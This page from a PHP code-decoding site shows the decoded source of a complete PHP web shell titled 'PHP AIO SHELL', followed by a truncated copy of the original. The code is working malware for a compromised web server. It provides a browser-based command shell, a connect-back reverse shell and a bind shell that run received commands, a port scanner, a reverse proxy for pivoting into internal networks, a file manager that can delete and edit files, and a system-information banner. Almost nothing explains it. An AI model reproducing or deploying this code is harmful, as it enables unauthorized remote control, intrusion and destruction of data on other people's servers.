Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php session_start(); error_reporting(E_ALL); function read_file($file_name) { $fp = f..

Decoded Output download

<?php

session_start();
error_reporting(E_ALL);

function read_file($file_name)
{
	$fp = fopen($file_name, "r");
	if ($fp == false) {
		echo "open $file_name failed.
";
		return -1;
	}

	while (($buf = fgets($fp, 1024)) != false ) {
		echo $buf;
	}
	
	fclose($fp);
	return 0;
}

function copy_file($src_file, $dst_file)
{
	$src_fp = fopen($src_file, "r");
	if ($src_fp == false) {
		echo "open $src_file failed.
";
		return -1;
	}

	$dst_fp = fopen($dst_file, "w+");
	if ($dst_fp == false) {
		fclose($src_fp);
		return -1;
	}

	while (($buf = fgets($src_fp, 1024)) != false) {
		if (fwrite($dst_fp, $buf, strlen($buf)) == false) {
			echo "fwrite failed.
";
			fclose($src_fp);
			fclose($dst_fp);
			return -1;
		}
	}

	fclose($src_fp);
	fclose($dst_fp);
	return 0;
}

function copy_file_binary($src_file, $dst_file)
{
	if (file_exists($src_file) == false) {
		echo "file $src_file not exist.
";
		return -1;
	}

	if (copy($src_file, $dst_file) == false) {
		echo "copy $src to $dst_file failed.
";
		return -1;
	}
	echo "copy $src_file to $dst_file ok.
";

	return 0;
}

function delete_file($file_name)
{
	if (file_exists($file_name) == false) {
		echo "file $file_name not exist.";
		return -1;
	}

	if (unlink($file_name) == false) {
		echo "delete $file_name failed.";
		return -1;
	}
	echo "delete $file_name ok.
";

	return 0;
}

function edit_file($file_path)
{
	$file_name = basename($file_path);

	if (empty($_POST['newcontent'])) {
		echo '<form action="" method="post">';

		$fp=@fopen($file_name, "r");
		$data=@fread($fp, filesize($file_name));
	
		echo '<textarea name="newcontent" cols="80" rows="20" >';
		echo $data;
		@fclose($fp);
		echo '</textarea>
		<input type="submit" value="Edit"/>
		</form>';
	}
	else {
		$fp=@fopen($file_name, "w+");
		$result=@fwrite($fp, $_POST['newcontent']);
		@fclose($fp);
		if ($result == false) {
			echo "edit failed.";
		}
		else {
			echo "edit ok.";
		}
	}

}

function rename_file($old_file_name, $new_file_name)
{
	if (file_exists($old_file_name) == false) {
		echo "file $old_file_name not exist.
";
		return -1;
	}

	if (rename($old_file_name, $new_file_name) == false) {
		echo "rename $old_file_name to $new_file_name failed.
";
		return -1;
	}

	echo "rename $old_file_name to $new_file_name ok.
";
	return 0;
}

function get_human_size($bytes)
{
	$type=array("Bytes", "KB", "MB", "GB", "TB");
	$idx=0;

	while ($bytes >= 1024) {
		$bytes /= 1024;
		$idx++;
	}

	return (intval($bytes)." ".$type[$idx]);
}

function get_file_perms($file_name)
{
	return (substr(sprintf('%o', fileperms($file_name)), -4));
}


function get_human_file_perms($file_name)
{
	$perms = fileperms($file_name);

	if (($perms & 0xC000) == 0xC000) {
    		$info = 's';
	} elseif (($perms & 0xA000) == 0xA000) {
		$info = 'l';
	} elseif (($perms & 0x8000) == 0x8000) {
		$info = '-';
	} elseif (($perms & 0x6000) == 0x6000) {
    		$info = 'b';
	} elseif (($perms & 0x4000) == 0x4000) {
    		$info = 'd';
	} elseif (($perms & 0x2000) == 0x2000) {
		$info = 'c';
	} elseif (($perms & 0x1000) == 0x1000) {
		$info = 'p';
	} else {
		$info = 'u';
	}

	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
		(($perms & 0x0800) ? 's' : 'x' ) :
		(($perms & 0x0800) ? 'S' : '-'));

	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
		(($perms & 0x0400) ? 's' : 'x' ) :
		(($perms & 0x0400) ? 'S' : '-'));

	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
		(($perms & 0x0200) ? 't' : 'x' ) :
		(($perms & 0x0200) ? 'T' : '-'));

	return $info;
}

function get_file_owner($file_name)
{
	$uid=fileowner($file_name);
        $user_info = posix_getpwuid($uid);

        return $user_info['name'];
}

function read_dir($dir_path)
{
	if (is_dir($dir_path)) {
		if (($dp = opendir($dir_path)) == false) {
			echo "open $dir_path failed.
";
			return -1;
		}
		while (($file_name = readdir($dp)) != false) {
			if ($file_name == "." || $file_name == "..")
				continue;
			$sub_path = $dir_path."/".$file_name;
			echo "$sub_path
";
		}
	}

	closedir($dp);
	return 0;
}

function read_dirs($dir_path)
{
	echo '
<table>
<tr class="banner">
<td width="400" >Filename</td>
<td width="400" >Last modified</td>
<td width="400" >Size</td>
<td width="400" >Chmod/Perms</td>
<td width="400" >Action</td>
</tr>';

        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.
";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) {
                        if ($file_name == "." || $file_name == "..")
                                continue;
                        $sub_path = $dir_path."/".$file_name;
			$last_modify_time=date("Y/m/d H:i:s", fileatime($file_name));
			$file_size=filesize($file_name);
			$file_size_string=get_human_size($file_size);
			$file_perms=get_file_perms($file_name);
			$file_perms_string=get_human_file_perms($file_name);
			$file_owner=get_file_owner($file_name);
			
			echo '<tr class="directory">
			<td width="400" ><a href='.$file_name.'>'.$file_name.'</a></td>
			<td width="400" >'.$last_modify_time.'</td>
			<td width="400" >'.$file_size_string.'</td>
			<td width="400" >'.$file_perms.' / '.$file_perms_string.' / '.$file_owner.'</td>
			<td width="400" ><a href="webshell.php?delete='.$file_name.'"'.'>Delete </a>
				<a href="webshell.php?edit='.$file_name.'"'.'>Edit </a>
				<a href="webshell.php?download='.$file_name.'"'.'>Download </a>
				<a href="webshell.php?rename='.$file_name.'"'.'>Rename </a>
			</td>
			</tr>';

                }
        }

	echo '</table>';

        closedir($dp);
        return 0;
}

function aio_directory()
{
	$curr_path=getcwd();

	return read_dirs($curr_path);
}


function search_file_by_name($dir_path, $target_file)
{
        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.
";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) {
                        if ($file_name == "." || $file_name == "..")
                                continue;

                        $sub_path = $dir_path."/".$file_name;
                        if (is_dir($sub_path)) {
                                search_file_by_name($sub_path, $target_file);
                        }

			if (!strcmp($file_name, $target_file)) {
				echo "found $target_file.
";
				closedir($dp);
				return 0;
			}
                }

		echo "not found $target_file.
";
        	closedir($dp);
        }

        return -1;
}

/**
 * show file attribute with cetern flag.
 *
 * @dir_path - directroy to search.
 * @attr_flag - 0 readable.
 *            - 1 writeable.
 *            - 2 executable.
 */
function show_attr_file($dir_path, $attr_flag)
{
        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.
";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) { 
                        if ($file_name == "." || $file_name == "..")
                                continue;

                        $sub_path = $dir_path."/".$file_name;
                        if (is_dir($sub_path)) {
                                show_attr_file($sub_path, $attr_flag);
                        }
		
			if ($attr_flag == 0) {
				if (is_readable($file_name)) 
					echo "$sub_path
";
			}
			else if ($attr_flag == 1) {
				if (is_writable($file_name)) 
					echo "$sub_path
";
			}
			else if ($attr_flag == 2) {
				if (is_executable($file_name)) 
					echo "$sub_path
";
			}
			else {
				echo "wrong attribute flag.
";
				break;
			}
		}
		closedir($dp);
	}

	return 0;
}

function create_dir($dir_path)
{
	if (file_exists($dir_path))
		return -1;

	if (mkdir($dir_path, 0700) == false) {
		echo "create $dir_path failed.
";
		return -1;
	}
	echo "create $dir_path ok.
";
	return 0;
}

function destroy_dir($dir_path)
{
	if (file_exists($dir_path) == false)
		return -1;

	if (rmdir($dir_path) == false) {
		echo "delete $dir_path failed.
";
		return -1;
	}

	echo "delete $dir_path ok.
";
	return 0;
}

function destroy_dirs($dir_path)
{
        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.
";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) {
                        if ($file_name == "." || $file_name == "..")
                                continue;
                        $sub_path = $dir_path."/".$file_name;

                        if (is_dir($sub_path)) {
                                destroy_dirs($sub_path);
                        }
			else
				delete_file($sub_path);
                }

        	closedir($dp);
		destroy_dir($dir_path);
        	return 0;
        }

        return 0;
}

function linux_id()
{
	$uid = posix_getuid();
	$user_info = posix_getpwuid($uid);

	echo "uid=".$uid."(".$user_info['name'].") ";
	echo "gid=".$user_info['gid']."(".$user_info['name'].") ";
	echo "dir=".$user_info['dir']." ";
	echo "shell=".$user_info['shell']."
";
}

function linux_uname()
{
	$uname = posix_uname();

	echo $uname['sysname']." ".$uname['nodename']." ".$uname['release']." ";
	echo $uname['version']." ".$uname['machine'];
}

function get_proc_name($file_name)
{
        $fp = fopen($file_name, "r");
        if ($fp == false) {
                echo "open $file_name failed.
";
                return -1;
        }

        while (($buf = fgets($fp, 1024)) != false ) {
		if (strstr($buf, "Name:") != NULL) {
			sscanf($buf, "%s %s", $tmp, $name);
			fclose($fp);
			return $name;
		}
        }

        fclose($fp);
        return 0;
}

function get_proc_cmd($file_name)
{
        $fp = fopen($file_name, "r");
        if ($fp == false) {
                echo "open $file_name failed.
";
                return -1;
        }

	$cmd = fgets($fp, 1024);
	fclose($fp);

	return $cmd;
}

function linux_ps()
{
	if (($dp = opendir("/proc")) == false) {
		echo "open /proc failed.
";
		return -1;
	}
	echo "open /proc ok.
";

        while (($file_name = readdir($dp)) != false) {
        	if ($file_name == "." || $file_name == "..")
        		 continue;

		if (ctype_digit($file_name) == false)
			continue;
		
		$dir_path = "/proc/$file_name/status";
		$proc_name = get_proc_name($dir_path);

		$dir_path = "/proc/$file_name/cmdline";
		$proc_cmd = get_proc_cmd($dir_path);

		echo $file_name."		".$proc_name." ".$proc_cmd."
";
	}

	closedir($dp);
	return 0;
}

function tcp_connect($host, $port)
{
	$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
	if ($socket == false) {
		echo "create socket error.
";
		return -1;
	}

	if (@socket_connect($socket, $host, $port) == false) {
		socket_close($socket);
		return -1;
	}

	return $socket;
}

function tcp_connect_timeout($host, $port, $timeout)
{
	$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
	if ($socket == false) {
		echo "create socket error.
";
		return -1;
	}

	if (socket_set_nonblock($socket) == false) {
		echo "set nonblock error.
";
		socket_close($socket);
		return -1;
	}

	$time = time();
	while (!@socket_connect($socket, $host, $port)) {
		$err = socket_last_error($socket);
		if ($err == 115 || $err == 114) {
			if ((time() - $time) >= $timeout) {
				socket_close($socket);
				echo "socket timeout.
";
				return -1;
			}
			sleep(1);
			continue;
		}
		socket_close($socket);
		return -1;
	}
	
	echo "connect to $host:$port ok.
";
	return $socket;
}

function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2)
{
        $socket1 = tcp_connect($remote_host1, $remote_port1);
        if ($socket1 == -1) {
                echo "connect to $remote_host1:$remote_port1 failed.
";
                return -1;
        }
        echo "connect to $remote_host1:$remote_port1 ok.
";

        $socket2 = tcp_connect($remote_host2, $remote_port2);
        if ($socket2 == -1) {
                echo "connect to $remote_host2:$remote_port2 failed.
";
                socket_close($socket1);
                return -1;
        }
        echo "connect to $remote_host2:$remote_port2 ok.
";

        run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2);

        return 0;
}

function web_proxy_client()
{
        echo '<html><head><style>
                h3.banner
                {
                text-align:center;
                color:#384850;
                font-weight:bold;
                }
                form
                {
                text-align:center;
                }
                input[type=text]
                {
                width:300px;
                color:#384850;
                background-color:#ffffff;
                }
                input[type=submit]
                {
                width:80px;
                color:#384850;
                background-color:#ffffff;
                }
                </head></style>
                <body>
		<h3 class="banner">Linux reverse proxy</h3>
                <form action="" method="post">
		<b>intranet host</b>
                <input type="text" name="intranet_host" />
                <b>intranet port</b>
                <input type="text" name="intranet_port" /><br />
		<b>public host</b>
                <input type="text" name="public_host" />
                <b>public   port</b>
                <input type="text" name="public_port" /><br /><br />
                <input type="submit" value="Run" />
                </form>
                </body>
                </html>';

        if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) || 
		empty($_POST['public_host']) ||  empty($_POST['public_port']))
                return -1;

	run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'],
			$_POST['public_host'], $_POST['public_port']);
}

function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2)
{
        while (true) {
                $read_sockets = array($socket1, $socket2);
                $write_sockets = NULL;
                $except_sockets = NULL;

                if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) {
                        echo "socket_select error ".socket_strerror(socket_last_error())."
";
                        break;
                }

                if (in_array($socket2, $read_sockets)) {
                        //echo "got data from $remote_host2.
";

                        $bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT);
                        if ($bytes2 == false) {
                                echo "socket_recv ".socket_strerror(socket_last_error($socket2))."
";
                                break;
                        }
                        //echo "got bytes $bytes2.
";

                        if ($bytes2 == 0) {
                                echo "recv no data from $remote_host2.
";
                                break;
                        }

                        $ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR);
                        if ($ret2 == false) {
                                echo "socket_send ".socket_strerror(socket_last_error($socket1))."
";
                                break;
                        }
                        if ($ret2 != $bytes2) {
                                echo "send data failed.
";
                                break;
                        }
                        //echo "write $ret2 bytes ok.
";
                }
                if (in_array($socket1, $read_sockets)) {
                        //echo "got data from $remote_host1.
";

                        $bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT);
                        if ($bytes1 == false) {
                                echo "socket_recv ".socket_strerror(socket_last_error($socket1))."
";
                                break;
                        }
                        //echo "got bytes $bytes1.
";

                        if ($bytes1 == 0) {
                                echo "recv no data from $remote_host1.
";
                                break;
                        }

                        $ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR);
                        if ($ret1 == false) {
                                echo "socket_send ".socket_strerror(socket_last_error($socket2))."
";
                                break;
                        }
                        if ($ret1 != $bytes1) {
                                echo "send data failed.
";
                                break;
                        }
                        //echo "write $ret1 bytes ok.
";
                }
        }

        echo "proxy done.
";
        socket_close($socket1);
        socket_close($socket2);

        return 0;
}

function init_proxy_server($local_port)
{
        $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        if ($socket == false) {
                echo "create socket error.
";
                return -1;
        }

        if (socket_bind($socket, '0', $local_port) == false) {
                echo "bind sock error.
";
                socket_close($socket);
                return -1;
        }

        if (socket_listen($socket) == false) {
                echo "listen sock error.
";
                socket_close($socket);
                return -1;
        }
        echo "listen on port $local_port ok.
";

        return $socket;
}


function run_proxy_server($local_port1, $local_port2)
{
        $socket1 = init_proxy_server($local_port1);
        if ($socket1 == -1)
                return -1;

        while (true) {
                if (($newsock1 = socket_accept($socket1)) !== false) {
                        socket_getpeername($newsock1, $ip1);
                        echo "got a client form $ip1
";
                        break;
                }
        }
        $socket2 = init_proxy_server($local_port2);
        if ($socket2 == -1)
                return -1;

        while (true) {
                if (($newsock2 = socket_accept($socket2)) !== false) {
                        socket_getpeername($newsock2, $ip2);
                        echo "got a client form $ip2
";
                        break;
                }
        }

        echo "start transmit data ...
";
        run_proxy_core($newsock2, $ip2, $newsock1, $ip1);

        socket_close($socket2);
        socket_close($socket1);

        return 0;
}

function tcp_connect_port($host, $port, $timeout)
{
	$fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
		
	return $fp;
}

function port_scan_fast($host, $timeout, $banner)
{
$general_ports = array(
		'21'=>'FTP',
		'22'=>'SSH',
		'23'=>'Telnet',
		'25'=>'SMTP',
		'79'=>'Finger',
		'80'=>'HTTP',
		'81'=>'HTTP/Proxy',
		'110'=>'POP3',
		'135'=>'MS Netbios',
		'139'=>'MS Netbios',
		'143'=>'IMAP',
		'162'=>'SNMP',
		'389'=>'LDAP',
		'443'=>'HTTPS',
		'445'=>'MS SMB',
		'873'=>'rsync',
		'1080'=>'Proxy/HTTP Server',
		'1433'=>'MS SQL Server',
		'2433'=>'MS SQL Server Hidden',
		'1521'=>'Oracle DB Server',
		'1522'=>'Oracle DB Server',
		'3128'=>'Squid Cache Server',
		'3129'=>'Squid Cache Server',
		'3306'=>'MySQL Server',
		'3307'=>'MySQL Server',
		'3500'=>'Squid Cache Server',
		'3389'=>'MS Terminal Service',
		'5800'=>'VNC Server',
		'5900'=>'VNC Server',
		'8080'=>'Proxy/HTTP Server',
		'10000'=>'Webmin',
		'11211'=>'Memcached'
		);

	echo '<table>';
		
	foreach($general_ports as $port=>$name) {
		if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
			if (empty($banner) == false) {
				$data = fgets($fp, 128);
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>'.$name.'</td>
					<td>'.$data.'</td>
					</tr>';
			}
			else {
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>'.$name.'</td>
					</tr>';
			}
			fclose($fp);
		}
	} 
	echo '</table>';
}

function port_scan($host, $src_port, $dst_port, $timeout, $banner)
{
	echo '<table>
		<tr>
		<td>Host</td>
		<td>Port</td>
		<td>State</td>
		</tr>';

        for ($port = $src_port; $port <= $dst_port; $port++) {
		if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
			if (empty($banner) == false) {
				$data = fgets($fp, 128);
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>'.$data.'</td>
					</tr>';
			}
			else {
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>OPEN</td>
					</tr>';
			}
			fclose($fp);
		}
        }
	echo '</table>';
}


function run_portscan()
{
	echo '<html>
		<head>
		<style>
		tr.directory
		{
		font-size:14px;
		text-align:left;
		height:20px;
		border:1px solid #98bf21;
		padding:2px 6px 2px 6px;
		}
		</style>
		</head>
		<body>
		<form action="" method="post">
		target host
		<input type="text" name="scan_host" value="127.0.0.1" />
		timeout
		<input type="text" name="scan_timeout" value="5" />
		general ports
		<input type="checkbox" name="scan_fast" />
		banner
		<input type="checkbox" name="scan_banner" />
		<input type="submit" value="scan" />
		</form>
		</body>
		</html>';

	if (empty($_POST['scan_host']))
		return -1;
	
	if (isset($_POST['scan_fast'])) {
		port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'], 
				$_POST['scan_banner']);
	}
	else {
		port_scan($_POST['scan_host'], "1", "65535", 
				$_POST['scan_timeout'], 
				$_POST['scan_banner']);
	}
}

function linux_exec($socket, $cmd)
{
        $handle = popen($cmd, "r");

        while (($buf = fgets($handle, 1024)) != false) {
                $ret = socket_write($socket, $buf, strlen($buf));
                if ($ret == false) {
                        return -1;
                }
        }

        pclose($handle);
        return 0;
}

function connect_backdoor($host, $port)
{
        $banner = "connect back from phpshell
";

        $socket = tcp_connect($host, $port);
        if ($socket == -1) {
		echo "connect to $host:$port failed.
";
                return -1;
	}
	echo "connect to $host:$port ok.
";

        $ret = socket_write($socket, $banner, strlen($banner));
        if ($ret == false) {
		echo "write data failed.
";
                socket_close($socket);
                return -1;
        }

        while (true) {
                $buf = socket_read($socket, 1024);
                echo $buf;
                linux_exec($socket, $buf);
        }
}

function bindshell($local_port)
{
        $banner = "bindshell from phpshell
";

        $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        if ($socket == false) {
                echo "create socket error.
";
                return -1;
        }

        if (socket_bind($socket, '0', $local_port) == false) {
                echo "bind sock error.
";
                socket_close($socket);
                return -1;
        }

        if (socket_listen($socket) == false) {
                echo "listen sock error.
";
                socket_close($socket);
                return -1;
        }
        echo "listen on port $local_port ok.
";

        while (true) {
                if (($newsock = socket_accept($socket)) !== false) {
                        socket_getpeername($newsock, $ip);
                        echo "got a client form $ip"."<br />";
                        break;
                }
        }

        $ret = socket_write($newsock, $banner, strlen($banner));
        if ($ret == false) {
                echo "write data failed.
";
                socket_close($newsock);
                socket_close($socket);
                return -1;
        }

        while (true) {
                $buf = socket_read($newsock, 1024);
                echo $buf;
                linux_exec($newsock, $buf);
        }

	socket_close($newsock);
	socket_close($socket);
	return 0;
}

function run_backdoor()
{
        echo '<html><head><style>
		h3.banner
		{
		text-align:center;
		color:#384850;
		font-weight:bold;
		}
		form
		{
		text-align:center;
		}
                input[type=text]
                {
                width:300px;
                color:#384850;
                background-color:#ffffff;
                }
                input[type=submit]
                {
                width:80px;
                color:#384850;
                background-color:#ffffff;
                }
		</head></style>
                <h3 class="banner" >Linux connect backdoor</h3>
                <form action="" method="post">
                Target host
                <input type="text" name="target_host" />
                Target port
                <input type="text" name="target_port" />
                <input type="submit" value="Connect" />
                </form>
		</br />
                <h3 class="banner" >Linux bindshell backdoor</h3>
                <form action="" method="post">
		Bind port
                <input type="text" name="bind_port" />
                <input type="submit" value="Bindshell" />
                </form>
		</html>';

        if ($_POST['target_host'] && $_POST['target_port']) {
                connect_backdoor($_POST['target_host'], $_POST['target_port']);
        }
	if ($_POST['bind_port']) {
		bindshell($_POST['bind_port']);
	}
}

/*
function exec_shell($cmd)
{
        $handle = popen($cmd, "r");

        while (($buf = fgets($handle, 1024)) != false) {
		echo $buf;
        }

        pclose($handle);
        return 0;
}

function run_shell()
{
	$host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
        $uid = posix_getuid();
        $user_info = posix_getpwuid($uid);

	echo '<html>
		<head>
		<style>
                input[type=text]
                {
                width:1130px;
                color:#384850;
                background-color:#ffffff;
                }
		textarea
		{
                width:1130px;
                color:#384850;
                background-color:#ffffff;
		}
		</style>
		</head>
		<body>
		<form action="" method="post">
		<font color="#384850">'.$user_info['name'].'@'.$host_name.'$</font>
		<input style="border:none" color="#384850" type="text" name="shellcmd" />
		<input style="border:none" color="#384850" type="submit" value="Execute" /><br /><br />
		<textarea name="textarea" cols="150" rows="30" readonly>';

	if ($_POST['shellcmd']) {
		//echo $user_info['name'].'@'.$host_name.'$';
		//echo $_POST['shellcmd'];
		exec_shell($_POST['shellcmd']);
		echo '</textarea></form></body></html>';
	}
}
*/

function run_terminal_shell($cmd)
{
        $handle = popen($cmd, "r");

        while (($buf = fgets($handle, 1024)) != false) {
                $data .= $buf."";
        }

        pclose($handle);
        return $data;
}

function aio_shell()
{
        $host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
        $uid = posix_getuid();
        $user_info = posix_getpwuid($uid);
	$curr_path = getcwd();
	$prompt=$user_info['name'].'@'.$host_name.':'.$curr_path;

        echo '<html>
        <head>
        <style>
        tr.banner
        {
        font-size: 18px;
        font-style:italic;
        color:#ffffff;
        background-color: #285070;
        }
        tr.prompt
        {
        font-size: 14px;
        color:#285800;
        background-color: #000000;
        }
        textarea {border: none; margin: 0px; padding: 2px 2px 2px; color: #285800; background-color: #000000;}
        input
        {
        color: #285800; background-color: #000000;
        }
        </style>
        <script type="text/javascript" language="JavaScript">
        function init()
        {
                document.shell.output.scrollTop = document.shell.output.scrollHeight;
        }
        </script>
        </head>
        <body onload="init()">
        <table align="center" border="0" width="600" cellpadding="0" cellspacing="0">
        <tr class="banner">
                <td width="10%"><b>TERMINAL</b></td>
                <td align="center">'.$prompt.'</td>
        </tr>

        <form name="shell" action="" method="post">
        <tr class="prompt">
        <td colspan="2" nowrap>
        <textarea name="output" rows="20" cols="90">';
        if ($_POST['shellcmd']) {
                $cmd_data = $prompt.'$'.$_POST['shellcmd']."
";
                $cmd_data .= run_terminal_shell($_POST['shellcmd']);
                $_SESSION['output'] .= $cmd_data;
                echo $_SESSION['output'];
        }

        echo '</textarea><br />'.$prompt.'$'.'
        <input style="border:none" type="text" name="shellcmd" />
        <input style="border:none" type="submit" value="" />
</td>
</tr>
</form>

<tr class="banner">
        <td align="center" height="20" colspan="2"> &copy wzt 2014 http://www.cloud-sec.org</td>
</tr>
</table>
</body>
</html>';

}

function webshell_main()
{
	if (isset($_GET['cmd'])) {
		if ($_GET['cmd'] == "backdoor") {
			run_backdoor();
		}
		if ($_GET['cmd'] == "shell") {
			aio_shell();
		}
		if ($_GET['cmd'] == "portscan") {
			run_portscan();
		}
		if ($_GET['cmd'] == "proxy") {
			web_proxy_client();
		}
	}
	else {
		echo '<html>
		<body>
		<table border="0" cellpadding="10"  cellspacing="20">
		<tr>
		<td><a href="webshell.php?cmd=showdir">show directorys</a></td>
		<td><a href="webshell.php?cmd=backdoor">connect backdoor</a></td>
		<td><a href="webshell.php?cmd=portscan">port scan</a></td>
		<td><a href="webshell.php?cmd=proxy">reverse proxy</a></td>
		<td><a href="webshell.php?cmd=shell">cmd shell</a></td>
		</tr>
		</body>
		</html>';
	}
}

function aio_main()
{
	$uid = posix_getuid();
	$user_info = posix_getpwuid($uid);

	$uid_banner="uid=".$uid."(".$user_info['name'].") ".
                	"gid=".$user_info['gid']."(".$user_info['name'].") ".
                	"dir=".$user_info['dir']." ".
                	"shell=".$user_info['shell'];

	$uname = posix_uname();

	$uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ".
                	$uname['version']." ".$uname['machine'];

	$server_addr=$_SERVER['SERVER_NAME'];
	$server_port= $_SERVER['SERVER_PORT'];

	$server_time=date("Y/m/d h:i:s",time());
	$phpsoft=$_SERVER['SERVER_SOFTWARE'];
	$php_version=PHP_VERSION;
	$zend_version=zend_version();
	$dis_func=get_cfg_var("disable_functions");
	$safemode=@ini_get('safe_mode');
	if ($safemode == false)
		$safemode="On";
	$cwd_path=getcwd();
	$total_disk=disk_total_space("/");
	$total_disk_gb=intval($total_disk/(1024*1024*1024));
	$free_disk=disk_free_space("/");
	$free_disk_gb=intval($free_disk/(1024*1024*1024));
echo '<html>
<head>
<style>
body
{
background-color:#FFFFFF;
}

ul.banner
{
list-style-type:none;
margin:0;
padding:0;
text-align:center;
color:#384850;
background-color:gray;
font-size:20px;
font-weight:bold;
}

ul.directory
{
font-size:14px;
text-align:left;
font-weight: bold;
}

li
{
display:inline;
}

a:link
{
color:#384850;
}
a:visited
{
color:#384850;
}
a:hover
{
color:#384850;
}
a:active
{
color:#384850;
}

h2.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}

table.banner
{
font-size:14px;
}

tr.banner
{
font-size:16px;
color:#384850;
background-color:gray;
}

tr.directory
{
font-size:14px;
text-align:left;
height:20px;
border:1px solid #98bf21;
padding:2px 6px 2px 6px;
}

p.banner
{
font-size:14px;
}

</style>
</head>

<body>
<h2 class="banner">PHP AIO SHELL</h2>
<hr />
<table class="banner">
<tr>
<td width="1200" >User: '.$uid_banner.'</td>
<td width="200" align="center" >'.$server_time.'</td>
</tr>
<tr>
<td width="1200" >Uname: '.$uname_banner.'</td>
<td width="200" align="center" >'.$server_addr.":".$server_port.'</td>
</tr>
</table>
<hr />

<p class="banner">Software: '.$phpsoft.' | PHP: '.$php_version.' | ZEND: '.$zend_version.'
 | Safemode: '.$safemode.' | disfunc: '.$dis_func.'
</p>

<table class="banner">
<tr>
<td width="200" align="left">Directroy: '.$cwd_path.'</td>
<td width="200" >Disk: total '.$total_disk_gb.'GB free '.$free_disk_gb.'GB </td>
</tr>
</table>
<br />

<ul class="banner">
<li><a href="webshell.php?cmd=dir">[Directorys]</a></li>
<li><a href="webshell.php?cmd=backdoor">[Backdoor]</a></li>
<li><a href="webshell.php?cmd=portscan">[PortScan]</a></li>
<li><a href="webshell.php?cmd=proxy">[Proxy]</a></li>
<li><a href="webshell.php?cmd=shell">[Shell]</a></li>
<li><a href="webshell.php?cmd=crack">[Crack]</a></li>
<li><a href="webshell.php?cmd=mysql">[Mysql]</a></li>
</ul>
<br />

</body>
</html>';

        if ($_GET['cmd']) {
		if ($_GET['cmd'] == "dir") {
			aio_directory();
		}
                if ($_GET['cmd'] == "backdoor") {
                        run_backdoor();
                }
                if ($_GET['cmd'] == "shell") {
                        aio_shell();
                }
                if ($_GET['cmd'] == "portscan") {
                        run_portscan();
                }
                if ($_GET['cmd'] == "proxy") {
                        web_proxy_client();
                }
        }

	if ($_GET['delete']) {
		delete_file($_GET['delete']);	
	}
	if ($_GET['edit']) {
		edit_file($_GET['edit']);
	}
}

aio_main();
?>

Did this file decode correctly?

Original Code

<?php

session_start();
error_reporting(E_ALL);

function read_file($file_name)
{
	$fp = fopen($file_name, "r");
	if ($fp == false) {
		echo "open $file_name failed.\n";
		return -1;
	}

	while (($buf = fgets($fp, 1024)) != false ) {
		echo $buf;
	}
	
	fclose($fp);
	return 0;
}

function copy_file($src_file, $dst_file)
{
	$src_fp = fopen($src_file, "r");
	if ($src_fp == false) {
		echo "open $src_file failed.\n";
		return -1;
	}

	$dst_fp = fopen($dst_file, "w+");
	if ($dst_fp == false) {
		fclose($src_fp);
		return -1;
	}

	while (($buf = fgets($src_fp, 1024)) != false) {
		if (fwrite($dst_fp, $buf, strlen($buf)) == false) {
			echo "fwrite failed.\n";
			fclose($src_fp);
			fclose($dst_fp);
			return -1;
		}
	}

	fclose($src_fp);
	fclose($dst_fp);
	return 0;
}

function copy_file_binary($src_file, $dst_file)
{
	if (file_exists($src_file) == false) {
		echo "file $src_file not exist.\n";
		return -1;
	}

	if (copy($src_file, $dst_file) == false) {
		echo "copy $src to $dst_file failed.\n";
		return -1;
	}
	echo "copy $src_file to $dst_file ok.\n";

	return 0;
}

function delete_file($file_name)
{
	if (file_exists($file_name) == false) {
		echo "file $file_name not exist.";
		return -1;
	}

	if (unlink($file_name) == false) {
		echo "delete $file_name failed.";
		return -1;
	}
	echo "delete $file_name ok.\n";

	return 0;
}

function edit_file($file_path)
{
	$file_name = basename($file_path);

	if (empty($_POST['newcontent'])) {
		echo '<form action="" method="post">';

		$fp=@fopen($file_name, "r");
		$data=@fread($fp, filesize($file_name));
	
		echo '<textarea name="newcontent" cols="80" rows="20" >';
		echo $data;
		@fclose($fp);
		echo '</textarea>
